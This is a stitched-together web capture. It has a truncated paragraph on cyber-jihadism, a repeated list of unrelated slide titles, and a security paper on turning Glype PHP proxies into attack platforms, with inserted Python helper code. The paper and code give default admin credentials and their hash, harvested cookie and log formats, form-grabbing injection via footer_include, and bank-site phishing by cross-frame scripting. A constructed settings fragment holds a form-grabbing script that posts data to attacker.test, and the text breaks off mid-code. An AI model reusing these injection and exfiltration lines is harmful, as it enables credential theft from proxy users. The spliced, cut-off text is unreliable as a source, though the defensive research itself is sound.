One of the less well-reported aspects of cybercrime – and one that poses a very real threat to the integrity of companies' IT resources, as well as those of Western governments – is the issue of cyber-terrorism. According to Dancho Danchev, an Amsterdam-based security blogger with Webroot and an Internet/security researcher since the mid-1990s, the reason for this is largely a lack of understanding of what cyber-jihadism is all about. Coupled with a lack of understanding about the teachings of the Koran and the Islamic faith, this has resulted in the topic becoming something of a no-go area for Western security researchers, despite the fact that the more extremist elements in Islamic countries are increasingly using relatively advanced technology in the shape of

COMPUTER 10: Lesson 7 - File Storage and Online Collaborationbruanjhuli
 
Computer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsComputer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsSeth Reyes
 
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1DianaGray10
 
activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdf
activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdf
activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdfJamie (Taka) Wang
 
Machine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdfMachine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdfAijun Zhang
 
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationUsing IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationIES VE
 
UiPath Studio Web workshop series - Day 5
UiPath Studio Web workshop series - Day 5UiPath Studio Web workshop series - Day 5
UiPath Studio Web workshop series - Day 5DianaGray10
 
Introduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxIntroduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxMatsuo Lab
 
VoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBXVoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBXTarek Kalaji
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxGDSC PJATK
 
UiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPathCommunity
 
The Kubernetes Gateway API and its role in Cloud Native API Management
The Kubernetes Gateway API and its role in Cloud Native API ManagementThe Kubernetes Gateway API and its role in Cloud Native API Management
The Kubernetes Gateway API and its role in Cloud Native API ManagementNuwan Dias
 
Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024D Cloud Solutions
 
How Accurate are Carbon Emissions Projections?
How Accurate are Carbon Emissions Projections?How Accurate are Carbon Emissions Projections?
How Accurate are Carbon Emissions Projections?IES VE
 
Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1DianaGray10
 
Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024SkyPlanner
 
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfUiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfDianaGray10
 
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAAnypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAshyamraj55
 

Último (20)

OpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureOpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability Adventure
 
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online CollaborationCOMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
 
Computer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsComputer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and Hazards
 
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
 
20230104 - machine vision
20230104 - machine vision20230104 - machine vision
20230104 - machine vision
 
activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdf
activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdf
activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdf
 
Machine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdfMachine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdf
 
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationUsing IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
 
UiPath Studio Web workshop series - Day 5
UiPath Studio Web workshop series - Day 5UiPath Studio Web workshop series - Day 5
UiPath Studio Web workshop series - Day 5
 
Introduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxIntroduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptx
 
VoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBXVoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBX
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptx
 
UiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation Developers
 
The Kubernetes Gateway API and its role in Cloud Native API Management
The Kubernetes Gateway API and its role in Cloud Native API ManagementThe Kubernetes Gateway API and its role in Cloud Native API Management
The Kubernetes Gateway API and its role in Cloud Native API Management
 
Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024
 
How Accurate are Carbon Emissions Projections?
How Accurate are Carbon Emissions Projections?How Accurate are Carbon Emissions Projections?
How Accurate are Carbon Emissions Projections?
 
Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1
 
Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024
 
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfUiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
 
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAAnypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
 

Abusing Glype Proxies - Attacks, Exploits and Defences

Aditya K Sood, Michigan State University; Peter Greko, SecNiche Security Labs; Richard J Enbody, Michigan State University
Network Security, December 2012

Proxies play a critical privacy role because they are widely used for anonymous surfing and identity cloaking on the Internet. Proxies also assist in traffic filtering, traffic management, log auditing, access policies and surfing restricted sites. Several types of proxies are available, but the Glype HTTP proxy is used extensively.[1]

Glype is an open source proxy written in PHP and is freely available for personal use. It can also be licensed for commercial use, and is available as a Firefox add-on called Proxilla.[2] The basic idea of a web proxy is to download requested web pages, modify them according to a set of proxy rules, and then forward them to the user. By standing between the user and the rest of the web, the proxy can give the user some anonymity in addition to other services. Proxies can also be transformed into attack platforms: a misconfigured proxy, for example, can be exploited by an attacker to steal sensitive information from its users. Our study focuses on attacks and malware distribution using Glype proxies. We present a model of the approach attackers use to transform a Glype proxy into an attack toolkit for spreading infections. For our experiments we used Glype versions 1.1 and 1.4. We describe the features of Glype proxies that help attackers, and conclude by proposing countermeasures.

Background

A number of studies have examined the use of public proxies as attack platforms. SANS, a co-operative research and security institution, conducted two studies on the integrity of public proxies. The first, by Powers, discussed the possibility of malware in public proxy lists.[3] It tracked the Koobface malware, which used open ports for incoming connections and hid its operations behind proxies taken from proxy lists. The second, by Brozycki, presented techniques for detecting proxies that provide anonymous access and proposed defences based on blacklisting and active monitoring.[4] Brozycki also proposed a number of IDS rules to prevent users inside a network from reaching blocked content.

In this paper we do not cover network-level anonymisers such as VPNs and Tor. The paper revolves around web-based anonymity using server-side web proxies. The primary difference between the Tor network and web-based proxies is that Tor implements multi-tier (multi-layer) anonymity before forwarding traffic to the destination, whereas web proxies have a two-tier (single-server) architecture.[5] In other words, the difference lies in the implementation of relays and in how traffic is routed between endpoints.

Huang et al discussed cache-poisoning attacks on transparent proxies using the socket APIs of Java and Flash.[6] The targets are transparent proxies that route requests according to the HTTP Host: header and cache responses at the same time. A malicious Flash or Java file, having first retrieved the socket policy file from the attacker's server, opens a raw socket to the attacker's host but sends an HTTP request whose Host: header names the victim site; the proxy then caches the attacker's response under the victim's URL. Cache poisoning attacks are quite common in network proxies.

The Swiss Security Team discussed the inability of Glype proxies to hide the user's identity entirely.[7] Its study showed how misconfiguration of a Glype proxy can lead to the disclosure of sensitive information.

Dissecting Glype

The primary purpose of the Glype proxy is to provide anonymous surfing. However, attackers can also transform a Glype proxy into a malware infection platform. To understand the attacks, it is important to understand the characteristics of Glype proxies.

To provide proxy services, each requested URL and each link inside a proxied page is encoded using plain base64. For example, consider this URL:

    hxxp://[Glype_proxy_url]/proxy/browse.php?u=Oi8vc2NyaXB0bWFmaWEub3JnLw%3D%3D&b=13&f=norefer

The u parameter carries the string 'Oi8vc2NyaXB0bWFmaWEub3JnLw==' (the %3D%3D is the URL-encoded '==' padding). A simple base64 decoding of this string yields '://scriptmafia.org/', which shows that the scheme name is not part of the encoded string and that the decoding process is trivial. Care is needed when handling special characters, because Glype follows PHP's encoding/decoding conventions: characters that are special in a query string (such as the '=' padding above) are percent-encoded, and special characters in variable names are encoded to maintain compatibility with registered global variables.
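The decoding just described, as an added example (not code from the paper or from Glype itself). It assumes only what the sample URL shows: the target travels in the u query parameter as base64 with the '=' padding percent-encoded, and the decoded text begins at '://'. Re-attaching 'http' to such a string, and the proxy host name used in the sample, are this example's own assumptions.

```python
"""Decode and encode Glype-style proxied URLs (added example, not Glype code)."""
import base64
import binascii
from urllib.parse import parse_qs, quote, urlsplit


def decode_glype_u(proxy_url: str) -> str:
    """Return the raw decoded 'u' parameter of a Glype browse.php URL."""
    query = parse_qs(urlsplit(proxy_url).query)   # parse_qs also turns %3D back into '='
    values = query.get("u")
    if not values:
        raise ValueError("no 'u' parameter in URL")
    # A literal '+' in a query string is decoded as a space by parse_qs;
    # in base64 it is a data character, so put it back.
    u = values[0].replace(" ", "+")
    # Some proxies drop the '=' padding; restore it so b64decode does not fail.
    u += "=" * (-len(u) % 4)
    try:
        return base64.b64decode(u, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError) as exc:
        raise ValueError(f"'u' is not valid base64: {u!r}") from exc


def target_url(proxy_url: str, default_scheme: str = "http") -> str:
    """Reconstruct a browsable URL from the decoded string.

    Assumption (not stated by the paper): a decoded value beginning with
    '://' means the scheme name was stripped, so default_scheme is prepended.
    """
    decoded = decode_glype_u(proxy_url)
    if decoded.startswith("://"):
        return default_scheme + decoded
    return decoded


def encode_glype_u(target: str) -> str:
    """Produce the percent-encoded 'u' value for a target, mirroring the sample.

    The scheme name is removed before encoding, matching the decoded sample
    in the paper ('://scriptmafia.org/'), and the '=' padding is percent-encoded.
    """
    split = urlsplit(target)
    stripped = target[len(split.scheme):] if split.scheme else target
    return quote(base64.b64encode(stripped.encode("utf-8")).decode("ascii"), safe="")


if __name__ == "__main__":
    # Constructed: the paper's sample parameters on an assumed proxy host.
    sample = ("http://proxy.example.net/proxy/browse.php"
              "?u=Oi8vc2NyaXB0bWFmaWEub3JnLw%3D%3D&b=13&f=norefer")
    print(decode_glype_u(sample))
    print(target_url(sample))
    print(encode_glype_u("http://scriptmafia.org/"))
```

Run against a web server log of a Glype host, this turns every browse.php line back into the site the client actually visited; the padding and '+' handling is what the paper's remark about special characters amounts to in practice.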
The Glype proxy can be extended using plugins; popular websites such as Facebook, Twitter and Gmail each have a separate plugin for Glype. Web page processing is handled by Glype's process.php page. For simplicity, the Glype proxy injects JavaScript into proxied pages so that the browser does not have to send HTTP POST requests to process.php. The Glype proxy uses HTTP headers such as Referer: and Location: for redirection purposes.

Google can be used to find misconfigured Glype proxies. By default, Glype writes its activity log to a log folder in the /tmp directory (/tmp/log). Knowing the location of the log allows a malicious user to craft efficient Google queries (Google dorks) that turn up misconfigured proxies whose logs are exposed.

The Glype proxy ships with default administrative credentials {username=admin, password=admin}. The password is stored as a hardcoded MD5 hash, which is susceptible to brute-force and dictionary attacks; for a secure configuration the default hash must be replaced. In its default configuration the Glype proxy does not cache proxied content and sends no-cache headers; Listing 1 shows the implementation of the cache module. It is nevertheless possible to configure the Glype proxy to send some cache headers using session_cache_limiter('private_no_expire').

Glype proxies suffer from several design weaknesses that attackers exploit. Some of the issues that make Glype proxies an effective hacker tool are discussed below.

Logging mechanism

By design, the Glype proxy is supposed to provide anonymity for its users. Unfortunately, weaknesses exist that can leak information about a user's identity. Since Glype is written in PHP, an attacker who controls the proxy can modify it freely to turn it into a tool for executing attacks. There are several kinds of information that attackers can easily steal by misconfiguring the Glype proxy's parameters and by writing a plugin that captures data.
Listing 1: Cache module in the Glype proxy

    # Send no-cache headers.
    function sendNoCache() {
        header( 'Cache-Control: no-store, no-cache, must-revalidate' );
        header( 'Cache-Control: post-check=0, pre-check=0', false );
        header( 'Pragma: no-cache' );
    }

Listing 2 shows the type of information logged when a user surfs a website through a Glype proxy. The proxy records each GET request as the client IP address, a timestamp and the URL requested.

Listing 2: Logs in the Glype proxy (client addresses masked)

    68.37.xxx.xxx, 07/Mar/2012:21:15:54 -0500, http://m.facebook.com
    68.37.xxx.xxx, 07/Mar/2012:21:15:55 -0500, http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/7L0JGfufUnz.png
    68.37.xxx.xxx, 07/Mar/2012:21:16:14 -0500, https://m.facebook.com/login.php?m=m&refsrc=http%3A%2F%2Fm.facebook.com%2F&refid=8
    68.37.xxx.xxx, 07/Mar/2012:21:16:15 -0500, https://s-static.ak.facebook.com/rsrc.php/v1/yz/r/aKhO2tw3FnO.png
    68.37.xxx.xxx, 07/Mar/2012:21:17:03 -0500, http://m.facebook.com/home.php?refsrc=http%3A%2F%2Fm.facebook.com%2F&refid=9&m_sess=1h7Hs5-j9bwiFsu&_rdr

Glype proxies also allow attackers to extract cookies, a potentially valuable source of personal information. The Glype proxy only offers an option for deleting cookies on the client side, not on the server side. To provide anonymity, cookies should be deleted completely on both sides, but this cannot happen. Listing 3 shows the cookies extracted for a user who visited Facebook.

In an attempt to provide anonymity, a Glype proxy does not log POST requests. However, an attacker can write a plugin to grab all POST requests. We developed such a plugin, which we demonstrate in the next section.

IP banning and restriction

Glype proxies provide extensive functionality for restricting IP addresses using the BlockScript web software.[8] It was designed to let administrators block HTTP requests from unwanted addresses or domains. However, this functionality is also useful for launching targeted attacks in which an attacker serves malicious content to a specific set of IP addresses and blocks everyone else. This property also subverts the generic approach of testing a server remotely, because a scanner coming from an address outside the targeted set never sees the malicious content. A Glype proxy uses the IP banning module shown in Listing 4.

In the code in Listing 4, a Glype proxy checks the client address against its list of banned or blacklisted IP addresses. If the address is found in the list, the Glype proxy returns a '403 Forbidden' response to the user. To make this malicious, an attacker can serve malicious web pages in place of the IP-banned message. In this way a user is not able to surf anonymously and still gets infected. Many further modifications can be made to the code to play with IP address restrictions.
Listing 3: Cookies collected by a Glype proxy (Netscape cookie-jar format: domain, include-subdomains flag, path, secure flag, expiry, name, value)

    #HttpOnly_.facebook.com   TRUE   /   FALSE   1394475951   datr          V4tbT71wsBGdD8j2XZgUBDlJ
    .facebook.com             TRUE   /   FALSE   0            lsd           1W12c
    #HttpOnly_.facebook.com   TRUE   /   FALSE   0            m_ts          1331403951
    .facebook.com             TRUE   /   FALSE   1            reg_ext_ref   deleted
    .facebook.com             TRUE   /   FALSE   0            reg_fb_gate   http%3A%2F%2Fm.facebook.com%2F
    .facebook.com             TRUE   /   FALSE   0            reg_fb_ref    http%3A%2F%2Fm.facebook.com%2F%2522http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2Fyr%2Fr%2FxgDlevwA9Y5.png%2522

Listing 4: IP banning module

    if ( empty($_SESSION['ip_verified']) || $_SESSION['ip_verified'] != $_SERVER['REMOTE_ADDR'] ) {
        if (!$CONFIG['enable_blockscript']) {
            # Current IP matches a banned IP? true/false
            $banned = false;
            # Examine all IP bans
            foreach ( $CONFIG['ip_bans'] as $ip ) {
                # Is this a range or single?
                if ( ($pos = strspn($ip, '0123456789.')) == strlen($ip) ) {
                    # Just a single IP so check for a match
                    if ( $_SERVER['REMOTE_ADDR'] == $ip ) {
                        # Flag the match and break out the loop
                        $banned = true;
                        break;
                    }
                    # And try next IP
                    continue;
                }
                // - - - - - Redacted (range handling) - - - - - //
            }
            # Is the IP address banned?
            if ( $banned ) {
                # Send a Forbidden header
                header('HTTP/1.1 403 Forbidden', true, 403);
                # Print the banned page and exit!
                echo loadTemplate('banned.page');
                exit;
            }
            # Still here? Must be OK so save IP in session to prevent rechecking next time
            $_SESSION['ip_verified'] = $_SERVER['REMOTE_ADDR'];
        }
    }
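What an operator of a malicious proxy actually harvests from the two files above, and what an analyst seizing such a proxy would want to pull out of them, as an added example (not code from the paper or from Glype). The input layouts follow Listing 2 (one 'client IP, timestamp, URL' line per proxied GET) and Listing 3 (Netscape cookie-jar lines with an '#HttpOnly_' prefix on HttpOnly cookies); the sample lines, client addresses and the list of credential-looking query keys are constructed for this example.

```python
"""Triage the log and cookie jar a Glype proxy leaves on disk (added example)."""
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass
from urllib.parse import urlsplit

# Constructed sample in the Listing 2 layout; addresses are documentation ranges.
SAMPLE_LOG = """\
192.0.2.10, 07/Mar/2012:21:15:54 -0500, http://m.facebook.com
192.0.2.10, 07/Mar/2012:21:16:14 -0500, https://m.facebook.com/login.php?m=m&refid=8
192.0.2.10, 07/Mar/2012:21:16:15 -0500, https://s-static.ak.facebook.com/rsrc.php/v1/yz/r/aKhO2tw3FnO.png
198.51.100.7, 07/Mar/2012:21:20:01 -0500, https://www.example-bank.test/olb/login?user=alice&pass=hunter2
this line is not a log entry
"""

# Constructed sample in the Listing 3 layout (tab-separated Netscape cookie jar).
SAMPLE_COOKIES = "\n".join([
    "# Netscape HTTP Cookie File",            # comment line, not a cookie
    "#HttpOnly_.facebook.com\tTRUE\t/\tFALSE\t1394475951\tdatr\tV4tbT71wsBGdD8j2XZgUBDlJ",
    ".facebook.com\tTRUE\t/\tFALSE\t0\tlsd\t1W12c",
    ".example-bank.test\tTRUE\t/\tTRUE\t0\tsession\tdeadbeef",
])

# Query keys whose presence in a logged GET URL means a credential was written
# to the proxy's log in clear text. The list is this example's own choice.
CREDENTIAL_KEYS = {"pass", "password", "passwd", "pwd", "token"}


@dataclass
class LogEntry:
    client: str
    timestamp: str
    url: str


@dataclass
class Cookie:
    domain: str
    name: str
    value: str
    http_only: bool
    secure: bool


def parse_log(text: str) -> list[LogEntry]:
    """Parse Listing 2 style lines; malformed lines are skipped, not fatal."""
    entries = []
    for line in text.splitlines():
        parts = [p.strip() for p in line.split(", ", 2)]
        if len(parts) == 3 and parts[2].startswith(("http://", "https://")):
            entries.append(LogEntry(*parts))
    return entries


def parse_cookie_jar(text: str) -> list[Cookie]:
    """Parse Netscape cookie-jar lines, honouring the #HttpOnly_ prefix."""
    cookies = []
    for line in text.splitlines():
        http_only = line.startswith("#HttpOnly_")
        if http_only:
            line = line[len("#HttpOnly_"):]
        elif line.startswith("#") or not line.strip():
            continue                                  # comment or blank line
        fields = line.split("\t")
        if len(fields) != 7:
            continue
        domain, _subdomains, _path, secure, _expiry, name, value = fields
        cookies.append(Cookie(domain, name, value, http_only, secure == "TRUE"))
    return cookies


def hosts_by_client(entries: list[LogEntry]) -> dict[str, set[str]]:
    """Map each client address to the hosts it visited through the proxy."""
    seen: dict[str, set[str]] = defaultdict(set)
    for e in entries:
        seen[e.client].add(urlsplit(e.url).hostname or "")
    return dict(seen)


def credential_leaks(entries: list[LogEntry]) -> list[LogEntry]:
    """GET requests whose query string carried a credential-looking key."""
    leaks = []
    for e in entries:
        keys = {kv.split("=", 1)[0].lower() for kv in urlsplit(e.url).query.split("&") if kv}
        if keys & CREDENTIAL_KEYS:
            leaks.append(e)
    return leaks


def cookies_for_client(entries: list[LogEntry], cookies: list[Cookie]) -> dict[str, list[Cookie]]:
    """Join harvested cookies to the clients whose visited hosts match the cookie domain."""
    joined: dict[str, list[Cookie]] = defaultdict(list)
    for client, hosts in hosts_by_client(entries).items():
        for c in cookies:
            # A '.facebook.com' cookie covers facebook.com and every subdomain.
            if any(h == c.domain.lstrip(".") or h.endswith(c.domain) for h in hosts):
                joined[client].append(c)
    return dict(joined)


if __name__ == "__main__":
    log = parse_log(SAMPLE_LOG)
    for client, hosts in hosts_by_client(log).items():
        print(client, sorted(hosts))
    for e in credential_leaks(log):
        print("credential in logged URL:", e.client, e.url)
    for client, cs in cookies_for_client(log, parse_cookie_jar(SAMPLE_COOKIES)).items():
        print(client, [c.name for c in cs])
```

The join in cookies_for_client is the point: the GET log alone identifies clients and sites, the cookie jar alone holds session tokens, and a proxy operator who keeps both can tie a live session to the address that created it.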
Threat model

Examining the threat model allows us to understand the roles of the various actors and how attackers compromise the integrity of users' sessions. The model covers the threats associated with end users and with administrators. Since we are concerned here with the Glype proxy, the attacks are modelled around the Man-in-the-Middle (MitM) paradigm.

During our research we noticed that Glype proxies are often configured in a very insecure way, for example with default or weak passwords. This misconfiguration allows attackers to compromise the proxy software with brute-force attacks. The primary risk is that attackers then exploit third-party resources, including the proxy's infrastructure and its traffic volume, to attack users at large scale. Glype is a server-side proxy, and compromising it has serious implications.

The Glype proxy provides anonymity on the web, but its users are susceptible to a wide variety of attacks. The attacker's primary goal is to make users surf Internet resources through the attacker's Glype proxy; the users' surfing habits and trust play a significant role in the execution of these insidious attacks. Information stealing, phishing and Cross-Frame Scripting (XFS) are some of the attacks that can be triggered easily using a Glype proxy. Since the Glype proxy is open source, its code can be modified, and its inherent features make it a more powerful weapon. In the next section we discuss some of the attacks using custom plugins. Remember that Glype is not a client-side proxy: it modifies the proxied web pages it serves to users, and can infect them.

Launching attacks using Glype

Attacks triggered using Glype proxies are based on the Man-in-the-Middle (MitM) paradigm. The MitM agent reads and writes the traffic between two endpoints on the network.
It is natural to equate the Glype proxy with a MitM agent, because traffic originating from the victim's machine passes through the Glype proxy interface before it reaches the web server. The attacker controls and administers the Glype proxy interface and can easily manipulate the requests and responses flowing between the client's browser and the web server. As a result, the user is served illegitimate and malicious content that subverts the normal operation of the browser. To support this theory, our team conducted several sets of tests to understand the impact of Glype proxy infection at large scale.

Data exfiltration – form grabbing

Data exfiltration attacks steal sensitive information from infected machines on the Internet, and it is easy to exfiltrate data from the users of a Glype proxy. The proxy provides a configuration file for managing its current run state, and it appeared possible for an attacker to infect all proxied web pages with illegitimate content. To test that theory we conducted an experiment to understand the impact of infecting proxied web pages. We found that a Glype proxy provides configuration parameters that can be used to inject content that is rendered in every page that is proxied. This capability can be devastating. We implemented a small jQuery program to grab all POST requests. Listing 5 shows the scripts we used in our tests:

- Code (1) serialises the data present in the forms on the page. It serialises the data the user entered in the form's input boxes and submits it to the malicious domain. This code is passed as the value of the footer_include configuration parameter, which injects it at the bottom of every proxied web page.
- Code (2) is the same script except that it does not send the form data to the server but triggers an alert notification instead. This code is used to validate that the script was successfully inserted into the web pages.
- Code (3) is the server-side PHP script that handles the incoming data and stores it in a log file for analysis.

Using the code in Listing 5, it is possible to log all the POST requests sent by the user's browser through the Glype proxy's interface. The POST data can be logged on the server side as shown in Listing 6. Figure 1 shows the successful execution of a script inserted into a proxied web page. This shows that it is very easy to inject scripts automatically by tweaking configuration parameters in the Glype proxy.

Cross-frame scripting and phishing

Cross-Frame Scripting (XFS) is an attack in which an attacker exploits the inability of web pages to prevent themselves from being framed in a web browser. The attacker loads the target website in an HTML iframe or frame and uses JavaScript from the attacker's own (primary) domain to interact with the target website loaded in the frame. XFS allows attackers to make a legitimate user perform rogue operations without their knowledge, and can be used to trigger phishing attacks. To counter this attack, many websites use anti-XFS (frame-busting) code.[9] HTML5's built-in 'sandbox' attribute on the iframe tag can be used to bypass such script-based restrictions.[10] Independently of this, a Glype proxy has the ability to rewrite URLs while proxying the content of a domain: it caches the URL and then applies its proxify function to rewrite it. An attacker can therefore configure the Glype proxy so that a phishing page looks original while the XFS protections are subverted.

We conducted an experiment using Glype proxy version 1.1 and changed its settings.php file to tweak the proxy into executing a phishing attack. We also modified the code to execute more advanced attacks, to understand the potential risk associated with a Glype proxy. Listing 7 shows the configuration we used in the demonstration attack.
In our configuration, Secure Sockets Layer (SSL) warnings are turned off. This allows the Glype proxy to suppress all SSL-related warnings. We also enabled hotlinking, the practice of loading content directly from a third-party domain; in a Glype proxy, hotlinking allows the attacker to send the user straight to an XFS web page. We enabled caching for faster execution: caching files such as CSS and images makes the browser store the content locally and use it directly without sending requests to the web server, so the attacker can speed up the loading of web pages in the client's browser. Finally, we allowed JavaScript, so that scripts can communicate with the objects on the web page. JavaScript is an essential component of many websites and applications; banking websites, for example, use JavaScript to interact with page objects dynamically. The attacker benefits from this because it allows the attacker to execute arbitrary script in the context of a proxied website.

We tested this configuration and found that it is possible to use XFS to conduct a phishing attack, as shown in Figure 2. Our experiment showed that sophisticated XFS protections can be circumvented with the help of a Glype proxy. In Figure 2, the legitimate Bank of America website is framed inside a Glype proxy interface without any warnings, which means that an attacker can inject scripts, as discussed earlier, to interact with the objects on the web page. Typically the user believes that he or she is surfing the bank website through a legitimate proxy, but in reality all the information in the user's session can be captured. In this layout the URL points to the domain where the Glype proxy is hosted.
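A way to audit a Glype installation for exactly this combination of settings, as an added example (not part of the paper or of Glype). It reads only one-line $CONFIG['key'] = value; assignments of the kind the paper's listings show (true/false, single-quoted strings, array('...') lists; any other expression is kept as raw text). Both fragments are constructed: the weak one combines the paper's Listing 7 values with a one-line version of the Listing 5 footer, the 'admin_password' key name is illustrative (the default-credential check matches the hash value, not the key), and the hardened values are this example's recommendations rather than settings quoted from the paper.

```python
"""Audit a Glype settings.php fragment for attack-enabling settings (added example)."""
import hashlib
import re

ASSIGN_RE = re.compile(
    r"""^\s*\$CONFIG\[\s*['"](?P<key>\w+)['"]\s*\]\s*=\s*(?P<value>.+?)\s*;\s*(?://.*|#.*)?$"""
)
QUOTED_RE = re.compile(r"'((?:[^'\\]|\\.)*)'")
DEFAULT_ADMIN_MD5 = hashlib.md5(b"admin").hexdigest()   # Glype ships with admin/admin

# Constructed: Listing 7 values plus a one-line form of the Listing 5 footer.
# The 'admin_password' key name is illustrative; the check below looks at the value.
WEAK_SETTINGS = r"""
// Configure SSL warnings
$CONFIG['ssl_warning'] = false;
$CONFIG['stop_hotlinking'] = false;
$CONFIG['hotlink_domains'] = array('www.bankofamerica.com');
$CONFIG['cookies_on_server'] = true;
$CONFIG['cookies_folder'] = $CONFIG['tmp_dir'] . 'cookies/';
$CONFIG['enable_logging'] = true;
$CONFIG['footer_include'] = '<script src="http://attacker.test/jquery.min.js"></script><script>$("form").submit(function(){$.post("logit.php",$("form").serialize());});</script>';
$CONFIG['admin_password'] = '21232f297a57a5a743894a0e4a801fc3';
"""

# Constructed: the same keys with the values this example recommends.
HARDENED_SETTINGS = r"""
$CONFIG['ssl_warning'] = true;
$CONFIG['stop_hotlinking'] = true;
$CONFIG['hotlink_domains'] = array();
$CONFIG['cookies_on_server'] = false;
$CONFIG['cookies_folder'] = $CONFIG['tmp_dir'] . 'cookies/';
$CONFIG['enable_logging'] = false;
$CONFIG['footer_include'] = '';
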